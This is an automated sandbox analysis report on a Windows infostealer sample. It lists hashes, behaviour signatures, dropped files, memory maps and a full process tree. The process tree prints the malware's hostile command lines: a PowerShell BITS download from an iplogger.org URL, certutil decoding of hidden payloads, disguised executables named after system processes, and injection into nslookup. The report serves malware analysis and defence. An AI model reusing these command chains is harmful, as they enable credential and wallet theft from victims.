Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-11-2020 18:07
Static task
static1
Behavioral task
behavioral1
Sample
ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe
Resource
win7v20201028
General
-
Target
ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe
-
Size
1.8MB
-
MD5
3202904112ba165a8401ef87661a1b8e
-
SHA1
052b8ada0a42f8e62ae6252c3f9ad6288485c92d
-
SHA256
ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723
-
SHA512
a0619a68fb4b121c762604ebdde44ff7b9693d8b62dc4cfdd2293d0cec6198fb067726ef9561973a544e23262c14a5843ea3c3bf87de8d468bc4125f7f91a5bd
Malware Config
Extracted
https://iplogger.org/1pzPe7
Signatures
-
Executes dropped EXE 6 IoCs
Processes:
csrss.comcsrss.comfontdrvhost.comfontdrvhost.comnslookup.exenslookup.exepid process 3944 csrss.com 2576 csrss.com 3500 fontdrvhost.com 2520 fontdrvhost.com 204 nslookup.exe 2144 nslookup.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
fontdrvhost.comcsrss.comdescription pid process target process PID 2520 set thread context of 204 2520 fontdrvhost.com nslookup.exe PID 2576 set thread context of 2144 2576 csrss.com nslookup.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
nslookup.exenslookup.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nslookup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nslookup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nslookup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nslookup.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 352 PING.EXE 3596 PING.EXE 4064 PING.EXE 200 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1272 powershell.exe 1272 powershell.exe 1272 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
fontdrvhost.comcsrss.compid process 2520 fontdrvhost.com 2576 csrss.com -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1272 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
nslookup.exepid process 204 nslookup.exe 204 nslookup.exe -
Suspicious use of WriteProcessMemory 65 IoCs
Processes:
ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.execmd.execmd.execmd.execsrss.comcmd.execmd.exefontdrvhost.comfontdrvhost.comcsrss.comnslookup.exedescription pid process target process PID 1304 wrote to memory of 3440 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 1304 wrote to memory of 3440 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 1304 wrote to memory of 3440 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 1304 wrote to memory of 2160 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 1304 wrote to memory of 2160 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 1304 wrote to memory of 2160 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 1304 wrote to memory of 1016 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 1304 wrote to memory of 1016 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 1304 wrote to memory of 1016 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 2160 wrote to memory of 1272 2160 cmd.exe powershell.exe PID 2160 wrote to memory of 1272 2160 cmd.exe powershell.exe PID 2160 wrote to memory of 1272 2160 cmd.exe powershell.exe PID 1016 wrote to memory of 2544 1016 cmd.exe cmd.exe PID 1016 wrote to memory of 2544 1016 cmd.exe cmd.exe PID 1016 wrote to memory of 2544 1016 cmd.exe cmd.exe PID 2544 wrote to memory of 352 2544 cmd.exe PING.EXE PID 2544 wrote to memory of 352 2544 cmd.exe PING.EXE PID 2544 wrote to memory of 352 2544 cmd.exe PING.EXE PID 2544 wrote to memory of 4044 2544 cmd.exe certutil.exe PID 2544 wrote to memory of 4044 2544 cmd.exe certutil.exe PID 2544 wrote to memory of 4044 2544 cmd.exe certutil.exe PID 2544 wrote to memory of 3944 2544 cmd.exe csrss.com PID 2544 wrote to memory of 3944 2544 cmd.exe csrss.com PID 2544 wrote to memory of 3944 2544 cmd.exe csrss.com PID 2544 wrote to memory of 3596 2544 cmd.exe PING.EXE PID 2544 wrote to memory of 3596 2544 cmd.exe PING.EXE PID 2544 wrote to memory of 3596 2544 cmd.exe PING.EXE PID 3944 wrote to memory of 2576 3944 csrss.com csrss.com PID 3944 wrote to memory of 2576 3944 csrss.com csrss.com PID 3944 wrote to memory of 2576 3944 csrss.com csrss.com PID 1304 wrote to memory of 2560 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 1304 wrote to memory of 2560 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 1304 wrote to memory of 2560 1304 ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe cmd.exe PID 2560 wrote to memory of 2292 2560 cmd.exe cmd.exe PID 2560 wrote to memory of 2292 2560 cmd.exe cmd.exe PID 2560 wrote to memory of 2292 2560 cmd.exe cmd.exe PID 2292 wrote to memory of 4064 2292 cmd.exe PING.EXE PID 2292 wrote to memory of 4064 2292 cmd.exe PING.EXE PID 2292 wrote to memory of 4064 2292 cmd.exe PING.EXE PID 2292 wrote to memory of 2820 2292 cmd.exe certutil.exe PID 2292 wrote to memory of 2820 2292 cmd.exe certutil.exe PID 2292 wrote to memory of 2820 2292 cmd.exe certutil.exe PID 2292 wrote to memory of 3500 2292 cmd.exe fontdrvhost.com PID 2292 wrote to memory of 3500 2292 cmd.exe fontdrvhost.com PID 2292 wrote to memory of 3500 2292 cmd.exe fontdrvhost.com PID 2292 wrote to memory of 200 2292 cmd.exe PING.EXE PID 2292 wrote to memory of 200 2292 cmd.exe PING.EXE PID 2292 wrote to memory of 200 2292 cmd.exe PING.EXE PID 3500 wrote to memory of 2520 3500 fontdrvhost.com fontdrvhost.com PID 3500 wrote to memory of 2520 3500 fontdrvhost.com fontdrvhost.com PID 3500 wrote to memory of 2520 3500 fontdrvhost.com fontdrvhost.com PID 2520 wrote to memory of 204 2520 fontdrvhost.com nslookup.exe PID 2520 wrote to memory of 204 2520 fontdrvhost.com nslookup.exe PID 2520 wrote to memory of 204 2520 fontdrvhost.com nslookup.exe PID 2520 wrote to memory of 204 2520 fontdrvhost.com nslookup.exe PID 2576 wrote to memory of 2144 2576 csrss.com nslookup.exe PID 2576 wrote to memory of 2144 2576 csrss.com nslookup.exe PID 2576 wrote to memory of 2144 2576 csrss.com nslookup.exe PID 2576 wrote to memory of 2144 2576 csrss.com nslookup.exe PID 2144 wrote to memory of 2412 2144 nslookup.exe cmd.exe PID 2144 wrote to memory of 2412 2144 nslookup.exe cmd.exe PID 2144 wrote to memory of 2412 2144 nslookup.exe cmd.exe PID 2144 wrote to memory of 2584 2144 nslookup.exe cmd.exe PID 2144 wrote to memory of 2584 2144 nslookup.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe"C:\Users\Admin\AppData\Local\Temp\ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo aPqmyxWPx2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -command Start-BitsTransfer -Source https://iplogger.org/1pzPe7 -Destination C:\Users\Admin\AppData\Local\Temp\12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Start-BitsTransfer -Source https://iplogger.org/1pzPe7 -Destination C:\Users\Admin\AppData\Local\Temp\13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < wMtueyMldwpSh.com2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping -n 1 ezgwO.pJC4⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\certutil.execertutil -decode Vdfl.com Y4⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.comcsrss.com Y4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com Y5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\oaqgxnokah.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\hxsjqqmh.exe"7⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < SSVJIWn.com2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping -n 1 bzfvVJ.gwroE4⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\certutil.execertutil -decode hNsNG.com M4⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.comfontdrvhost.com M4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com M5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\FvaGtBY.comMD5
f05a275d647c463849a793f4a7f71f52
SHA1d0eef69718c1d16a380fa2b012e12f08304a046f
SHA256da7cbc41e2389d26f34ff44ea4f91ba802d1c1e9452927c6cb1e1fc1f011c52a
SHA512b54cfe18c4ba2be7bf4a6fb323e76743201b627feafcc042e33df672dfb61a3c29e080fa79e7da17a17090a8d89d4ccc69477945b1c6b867c59921c84a894161
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\MMD5
0347e324fb878427506b6ffc5e46f66e
SHA1fa0d50de9f343926c548a9657a9693f60652805c
SHA25622ec3e07bdcd8d6eaeadb4ef7b1b34aa28691369fa99c32c753f8faf15bb658d
SHA5129562ac6eadfe252965ca5c5a91bd50645e3ebe43fd7415d2882ba3b892cb5642f42f1a97e085a7e011f4cfae0dffdc32ade6624574f91e4c7fee1f0d6cc74c35
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\SSVJIWn.comMD5
c38b261e8eafcff70de8b5e8785228fe
SHA1619c651b585dcb0c4d0873a90e650b26a2c3c998
SHA256527aba3ca0be4e0c85d51bc4205bb76313190cfb4d6169e45de6f3cff5f830b7
SHA512041149bf75d2c3061045d359f5a1ec109610d96c92280b10378ad2873e4c1ab9d701d3216139a2fb85b38c916b88052d6fd418154423f9f4f108905bbde9b988
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vdfl.comMD5
746b5a6a825ae849bc4c30673021a9b7
SHA1e96f931d914bd207c0141ee66368d07c41c91020
SHA256257c563c8497ef35038e2262a4a98ba5262d68ff69a3fe9d3c0a1f96bd578fcd
SHA512e21bb2b8c8af5a5b47073871b3feb9f34970d7fa7b746ecf83d39d5ae4f540ac7e25641ce7bd11dff1d14195781eb6399868c952eed103f2dd5a28eff1f3a595
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\YMD5
eb39fd2cb3ba6f58febc3fb85f0009aa
SHA1d9e6e8da51e7db0cb6ac5d6920381b33404e419c
SHA256f0edaa87bd93454585b29076a56fc6dd44b290ffb2c2f255fdb425506cc0b14e
SHA512559a98620345185a47dbf9dbd3e488550f6cd1adb00f210f5bdfb7d894f5d85ebe10f01e28dd49398da95e888dfd5e40c831eb360f61368e498841baa85544cf
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.comMD5
7098bdf41092092927874259196e5d80
SHA17ed19875c88e93fe3c0cc38b8bff56c61d0a8307
SHA256140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558
SHA512dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.comMD5
7098bdf41092092927874259196e5d80
SHA17ed19875c88e93fe3c0cc38b8bff56c61d0a8307
SHA256140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558
SHA512dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.comMD5
7098bdf41092092927874259196e5d80
SHA17ed19875c88e93fe3c0cc38b8bff56c61d0a8307
SHA256140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558
SHA512dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.comMD5
7098bdf41092092927874259196e5d80
SHA17ed19875c88e93fe3c0cc38b8bff56c61d0a8307
SHA256140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558
SHA512dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.comMD5
7098bdf41092092927874259196e5d80
SHA17ed19875c88e93fe3c0cc38b8bff56c61d0a8307
SHA256140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558
SHA512dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\hNsNG.comMD5
cce7c63f1535aabdaf4a9e39a4474569
SHA1c9d7580a5db9fce68dcd8077e7d6ab5a049c79c6
SHA2569734c779730a237aad5a367ef5a5aeaddd3c14283249b7c593b134843de38249
SHA512865c430a3000e2ba66c7376e8c287369c68c3d2737a8eed6df35925ba3764d75e70eba6b615edabaffeb5009fc2b2a3234070488344a2671bdcf783656c56568
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\mGsikxxdjfKtYgWEgo.comMD5
a9358bd23e30f7ae680ba7e16203c9d6
SHA1200fac7d7ef5a25429501fff125dae65330a1ece
SHA256fc755c8f26f7ea5a1d125be3df0c123e97a80f325cd3b4f433656c6391b1d1c1
SHA51279eb9e40ce16a8f12c96311dc80c6a974ed42e3e1157c9f2369a912637ff21ea783e94bf8fa43b94715d981fddcfc0a80c5ee45bcef5af189c198ecc90943fbf
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exeMD5
df4be7914c0ec7923e5740f44f629ff8
SHA184ec0080330f4d812755c901b01a3500874c9d36
SHA256c375b41006ca84f7a3ba98e4284f714c48d98b5fba5010034825bf4713ab76fa
SHA512e2c92f6b9df16431c8f83e96ae8f2a1761857248b9189e76fd1a1d2cbbfe3e46ffed7fcb7c972533245c44d77f0cefeef951442f17d3eb5e4373e838f3a86fc5
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exeMD5
df4be7914c0ec7923e5740f44f629ff8
SHA184ec0080330f4d812755c901b01a3500874c9d36
SHA256c375b41006ca84f7a3ba98e4284f714c48d98b5fba5010034825bf4713ab76fa
SHA512e2c92f6b9df16431c8f83e96ae8f2a1761857248b9189e76fd1a1d2cbbfe3e46ffed7fcb7c972533245c44d77f0cefeef951442f17d3eb5e4373e838f3a86fc5
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exeMD5
df4be7914c0ec7923e5740f44f629ff8
SHA184ec0080330f4d812755c901b01a3500874c9d36
SHA256c375b41006ca84f7a3ba98e4284f714c48d98b5fba5010034825bf4713ab76fa
SHA512e2c92f6b9df16431c8f83e96ae8f2a1761857248b9189e76fd1a1d2cbbfe3e46ffed7fcb7c972533245c44d77f0cefeef951442f17d3eb5e4373e838f3a86fc5
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\wMtueyMldwpSh.comMD5
fd487a7ef90b1cd7211ac94d4e773478
SHA1c2091875f5602effb1c2af62619027b4770b56f3
SHA2563b38bbd04026882191f7bf67c2ea06cc1c63fecf0440361abb1e125c2d3a75ba
SHA5121455649893c35b4d37859066404208de560fa006a4c76b5ab89396532e2d83a5148c5da85cd1546cb01275f9b70bbd9328068ad44147b3ee50b1bcf34d727392
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\xWnAext.comMD5
392e5cc019e763f0019337277db81081
SHA19402765f17c7e2b0cf15520ffef56476a855ab2c
SHA256852ed04ac131800dae464471a51a7d54063dad88ce1ebab7ce22fcab66900d01
SHA5124e0de123e4ff6f40bacded145bc0505a73a2cf39ff01878b8703b1dd6fc0059d4ce1e39c0d6043b389b7ecee0126e326c6e258b0bf472bf297179b3b945db553
-
memory/200-52-0x0000000000000000-mapping.dmp
-
memory/204-61-0x0000000000400000-0x00000000004A3000-memory.dmpFilesize
652KB
-
memory/204-59-0x0000000000463A1F-mapping.dmp
-
memory/204-58-0x0000000000400000-0x00000000004A3000-memory.dmpFilesize
652KB
-
memory/352-9-0x0000000000000000-mapping.dmp
-
memory/1016-2-0x0000000000000000-mapping.dmp
-
memory/1272-46-0x0000000009790000-0x0000000009791000-memory.dmpFilesize
4KB
-
memory/1272-21-0x00000000083D0000-0x00000000083D1000-memory.dmpFilesize
4KB
-
memory/1272-12-0x00000000078C0000-0x00000000078C1000-memory.dmpFilesize
4KB
-
memory/1272-26-0x0000000008230000-0x0000000008231000-memory.dmpFilesize
4KB
-
memory/1272-28-0x0000000009330000-0x0000000009363000-memory.dmpFilesize
204KB
-
memory/1272-35-0x00000000092F0000-0x00000000092F1000-memory.dmpFilesize
4KB
-
memory/1272-36-0x0000000009460000-0x0000000009461000-memory.dmpFilesize
4KB
-
memory/1272-37-0x0000000009600000-0x0000000009601000-memory.dmpFilesize
4KB
-
memory/1272-38-0x0000000009580000-0x0000000009581000-memory.dmpFilesize
4KB
-
memory/1272-39-0x00000000095D0000-0x00000000095D1000-memory.dmpFilesize
4KB
-
memory/1272-40-0x0000000009BA0000-0x0000000009BA1000-memory.dmpFilesize
4KB
-
memory/1272-20-0x0000000007A50000-0x0000000007A51000-memory.dmpFilesize
4KB
-
memory/1272-3-0x0000000000000000-mapping.dmp
-
memory/1272-11-0x0000000007AA0000-0x0000000007AA1000-memory.dmpFilesize
4KB
-
memory/1272-45-0x0000000009700000-0x0000000009701000-memory.dmpFilesize
4KB
-
memory/1272-13-0x0000000007B90000-0x0000000007B91000-memory.dmpFilesize
4KB
-
memory/1272-6-0x0000000072C60000-0x000000007334E000-memory.dmpFilesize
6.9MB
-
memory/1272-7-0x0000000004A70000-0x0000000004A71000-memory.dmpFilesize
4KB
-
memory/1272-10-0x00000000071A0000-0x00000000071A1000-memory.dmpFilesize
4KB
-
memory/1272-8-0x0000000007220000-0x0000000007221000-memory.dmpFilesize
4KB
-
memory/2144-64-0x00000000004040AB-mapping.dmp
-
memory/2144-66-0x0000000000400000-0x0000000000423000-memory.dmpFilesize
140KB
-
memory/2144-63-0x0000000000400000-0x0000000000423000-memory.dmpFilesize
140KB
-
memory/2160-1-0x0000000000000000-mapping.dmp
-
memory/2292-43-0x0000000000000000-mapping.dmp
-
memory/2412-67-0x0000000000000000-mapping.dmp
-
memory/2520-54-0x0000000000000000-mapping.dmp
-
memory/2544-5-0x0000000000000000-mapping.dmp
-
memory/2560-41-0x0000000000000000-mapping.dmp
-
memory/2576-23-0x0000000000000000-mapping.dmp
-
memory/2584-68-0x0000000000000000-mapping.dmp
-
memory/2820-48-0x0000000000000000-mapping.dmp
-
memory/3440-0-0x0000000000000000-mapping.dmp
-
memory/3500-50-0x0000000000000000-mapping.dmp
-
memory/3596-19-0x0000000000000000-mapping.dmp
-
memory/3944-17-0x0000000000000000-mapping.dmp
-
memory/4044-15-0x0000000000000000-mapping.dmp
-
memory/4064-47-0x0000000000000000-mapping.dmp